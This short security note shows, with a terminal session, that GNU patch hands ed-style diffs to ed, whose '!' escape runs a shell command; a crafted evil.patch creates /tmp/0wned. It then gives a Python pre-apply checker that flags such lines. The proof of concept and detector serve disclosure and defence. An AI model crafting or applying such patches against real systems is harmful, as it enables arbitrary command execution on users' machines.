patch runs ed, and ed can run anything
$ cat evil.patch
--- /dev/null 2018-13-37 13:37:37.000000000 +0100
+++ b/beep.c 2018-13-37 13:38:38.000000000 +0100
1337a
1,112d
!touch /tmp/0wned; ls -la /tmp/0wned
.
$ patch < evil.patch
?
?
-rw-r--r-- 1 edu users 0 Apr 5 10:42 /tmp/0wned
?
patch: **** /usr/bin/ed FAILED
$
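A pre-apply check for the behaviour shown above, as an added example that is not part of the original page: it reports shell-escape lines in the ed-style sections of a patch before the file is given to patch. The function name, the regexes and the UNIFIED and CONTEXT samples are assumptions constructed for illustration.

```python
import re

# Constructed sample: the ed-style patch from the session above.
EVIL_PATCH = (
    "--- /dev/null\t2018-13-37 13:37:37.000000000 +0100\n"
    "+++ b/beep.c\t2018-13-37 13:38:38.000000000 +0100\n"
    "1337a\n1,112d\n!touch /tmp/0wned; ls -la /tmp/0wned\n.\n"
)
# Constructed sample: a unified diff; its "!" sits behind a "+" prefix.
UNIFIED = "--- a/beep.c\n+++ b/beep.c\n@@ -1,2 +1,3 @@\n int x;\n+!x;\n int y;\n"
# Constructed sample: a context diff, where "! " marks changed lines.
CONTEXT = ("*** a/beep.c\n--- b/beep.c\n***************\n*** 1 ****\n"
           "! int x;\n--- 1 ----\n! int y;\n")

# Address + a/c/d on a line of its own: the command lines of an ed-style diff.
ED_CMD = re.compile(r"^\d+(,\d+)?[acd]$")
# Markers of the formats patch applies itself, without handing anything to ed.
OTHER_FORMAT = re.compile(r"^(@@ |\*\*\* |--- |\+\+\+ |\d+(,\d+)?[acd]\d)")
# ed runs a shell for "!cmd" and for r/w/e with a "!cmd" argument (case variants too).
SHELL_ESCAPE = re.compile(r"^[\d,.$;%\s]*(!|[rwWeE]\s*!)")


def find_ed_shell_escapes(patch_text):
    """Return [(line_number, line)] for shell escapes inside ed-style sections.

    Input mode is deliberately not tracked: in the session above "1337a"
    fails with "?" and ed stays in command mode, so the "!" line after it
    runs as a command, not as appended text. Every "!" line in an ed-style
    section is therefore reported, at the cost of some false positives.
    """
    findings, in_ed = [], False
    for number, line in enumerate(patch_text.splitlines(), start=1):
        if OTHER_FORMAT.match(line):
            in_ed = False          # header or hunk of a non-ed format
        elif ED_CMD.match(line):
            in_ed = True           # this part would be piped to ed
        elif in_ed and SHELL_ESCAPE.match(line):
            findings.append((number, line))
    return findings


if __name__ == "__main__":
    for sample in (EVIL_PATCH, UNIFIED, CONTEXT):
        print(find_ed_shell_escapes(sample) or "no ed shell escape found")
```

A non-empty result is a reason to reject the file or read it by hand before applying it.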